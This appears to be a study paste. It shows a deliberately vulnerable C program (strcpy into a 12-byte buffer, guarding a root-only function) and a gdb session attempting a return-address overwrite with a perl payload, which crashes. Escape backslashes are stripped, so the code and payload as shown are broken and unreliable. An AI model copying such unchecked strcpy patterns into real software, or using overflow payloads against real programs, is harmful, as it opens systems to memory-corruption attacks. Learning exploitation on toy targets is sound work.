#include <stdio.h>#include <string.h>#include <unistd.h>void public(char *ar

1. #include <stdio.h>
2. #include <string.h>
3. #include <unistd.h>
4.  
5. void public(char *args) {
6. char buff[12];
7. memset(buff, 'B', sizeof(buff));
8.  
9. strcpy(buff, args);
10. printf("nbuff: [%s] (%p)(%d)nn", &buff, buff, sizeof(buff));
11. }
12.  
13. void secret(void) {
14. printf("SECRETn");
15. exit(0);
16. }
17.  
18. int main(int argc, char *argv[]) {
19. int uid;
20. uid = getuid();
21.  
22. // Only when the user is root
23. if (uid == 0)
24. secret();
25.  
26. if (argc > 1) {
27. public(argv[1]);
28. }
29. else
30. printf("Kein Argument!n");
31. }
32.  
33. (gdb) info frame 0
34. Stack frame at 0xffffd2f0:
35. eip = 0x804852d in public (ret.c:11); saved eip = 0x804858c
36. called by frame at 0xffffd330
37. source language c.
38. Arglist at 0xffffd2e8, args: args=0xffffd575 "A"
39. Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
40. Saved registers:
41. ebp at 0xffffd2e8, eip at 0xffffd2ec
42.  
43. (gdb) print secret
44. $2 = {void (void)} 0x804852f <secret>
45.  
46. (gdb) print/x &buff
47. $4 = 0xffffd2d4
48.  
49. (gdb) run `perl -e '{print "A"x24; print "xecd2ffff"; }'`
50. The program being debugged has been started already.
51. Start it from the beginning? (y or n) y
52.  
53. Starting program: /home/patrick/Projekte/C/I. Stack_Overflow/ret `perl -e '{print "A"x24; print "xecd2ffff"; }'`
54.  
55. buff: [AAAAAAAAAAAAAAAAAAAAAAAA�d2
56. f
57. f] (0xffffd2b4)(12)
58.  
59.  
60. Program received signal SIGSEGV, Segmentation fault.
61. 0x0c3264ec in ?? ()